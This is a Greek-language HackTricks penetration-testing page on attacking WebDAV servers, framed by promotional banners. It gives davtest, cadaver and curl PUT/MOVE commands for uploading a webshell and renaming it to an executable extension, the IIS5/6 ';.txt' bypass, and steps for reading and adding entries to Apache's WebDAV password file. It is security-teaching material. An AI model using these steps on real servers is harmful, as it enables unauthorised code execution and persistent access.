11 KiB
WebDav
Χρησιμοποιήστε Trickest για να δημιουργήσετε εύκολα και να αυτοματοποιήσετε ροές εργασίας με τα πιο προηγμένα εργαλεία της παγκόσμιας κοινότητας.
Αποκτήστε πρόσβαση σήμερα:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα τηλεγραφήματος ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Όταν ασχολείστε με ένα HTTP Server με ενεργοποιημένο το WebDav, είναι δυνατόν να διαχειριστείτε αρχεία αν έχετε τα σωστά διαπιστευτήρια, συνήθως επαληθευμένα μέσω Βασικής Αυθεντικοποίησης HTTP. Η απόκτηση ελέγχου πάνω σε έναν τέτοιο διακομιστή συχνά περιλαμβάνει τη μεταφόρτωση και εκτέλεση ενός webshell.
Η πρόσβαση στον διακομιστή WebDav απαιτεί συνήθως έγκυρα διαπιστευτήρια, με το WebDav bruteforce να είναι ένας συνηθισμένος τρόπος απόκτησής τους.
Για να ξεπεράσετε τους περιορισμούς στις μεταφορτώσεις αρχείων, ειδικά αυτούς που εμποδίζουν την εκτέλεση σερβερ-πλευρικών σεναρίων, μπορείτε:
- Μεταφορτώστε αρχεία με εκτελέσιμες επεκτάσεις απευθείας αν δεν είναι περιορισμένες.
- Μετονομάστε τα μεταφορτωμένα μη-εκτελέσιμα αρχεία (όπως .txt) σε μια εκτελέσιμη επέκταση.
- Αντιγράψτε τα μεταφορωμένα μη-εκτελέσιμα αρχεία, αλλάζοντας την επέκτασή τους σε μια που είναι εκτελέσιμη.
DavTest
Το Davtest προσπαθεί να μεταφορτώσει αρκετά αρχεία με διαφορετικές επεκτάσεις και να ελέγξει αν η επέκταση εκτελείται:
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
Cadaver
Μπορείτε να χρησιμοποιήσετε αυτό το εργαλείο για να συνδεθείτε στον διακομιστή WebDav και να εκτελέσετε ενέργειες (όπως ανέβασμα, μετακίνηση ή διαγραφή) χειροκίνητα.
cadaver <IP>
Αίτηση PUT
curl -T 'shell.txt' 'http://$ip'
Αίτηση MOVE
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
Χρησιμοποιήστε το Trickest για να δημιουργήσετε εύκολα και να αυτοματοποιήσετε ροές εργασίας με τα πιο προηγμένα εργαλεία της παγκόσμιας κοινότητας.
Αποκτήστε πρόσβαση σήμερα:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
Ευπάθεια IIS5/6 WebDav
Αυτή η ευπάθεια είναι πολύ ενδιαφέρουσα. Το WebDav δεν επιτρέπει το ανέβασμα ή τη μετονομασία αρχείων με την κατάληξη .asp. Ωστόσο, μπορείτε να παρακάμψετε αυτό προσθέτοντας στο τέλος του ονόματος το ";.txt" και το αρχείο θα εκτελεστεί ως αν ήταν αρχείο .asp (μπορείτε επίσης να χρησιμοποιήσετε ".html" αντί για ".txt" αλλά ΜΗΝ ξεχάσετε το ";").
Στη συνέχεια μπορείτε να ανεβάσετε το shell σας ως αρχείο ".txt" και να το αντιγράψετε/μετακινήσετε σε ένα αρχείο ".asp;.txt". Αν προσπελάσετε αυτό το αρχείο μέσω του διακομιστή web, θα εκτελεστεί (το cadaver θα πει ότι η ενέργεια μετακίνησης δεν λειτούργησε, αλλά λειτούργησε).
Αποστολή διαπιστευμάτων
Αν το Webdav χρησιμοποιούσε έναν διακομιστή Apache, θα έπρεπε να εξετάσετε τις ρυθμίσεις των ιστότοπων στο Apache. Συνήθως:
/etc/apache2/sites-enabled/000-default
Μέσα σε αυτό μπορείτε να βρείτε κάτι παρόμοιο:
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
Όπως μπορείτε να δείτε υπάρχουν τα αρχεία με τα έγκυρα διαπιστευτήρια για τον διακομιστή webdav:
/etc/apache2/users.password
Μέσα σε αυτού του τύπου αρχεία θα βρείτε το όνομα χρήστη και ένα hash του κωδικού πρόσβασης. Αυτά είναι τα διαπιστευτήρια που χρησιμοποιεί ο διακομιστής webdav για την αυθεντικοποίηση των χρηστών.
Μπορείτε να προσπαθήσετε να τα αποκρυπτογραφήσετε, ή να προσθέσετε περισσότερα αν για κάποιο λόγο θέλετε να έχετε πρόσβαση στον διακομιστή webdav:
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
Για να ελέγξετε αν τα νέα διαπιστευτήρια λειτουργούν, μπορείτε να κάνετε:
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
Αναφορές
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρός Συνεργάτης AWS του HackTricks)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα τηλεγράφου ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Χρησιμοποιήστε το Trickest για να δημιουργήσετε εύκολα και να αυτοματοποιήσετε ροές εργασίας με τα πιο προηγμένα εργαλεία της κοινότητας.
Αποκτήστε πρόσβαση σήμερα:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}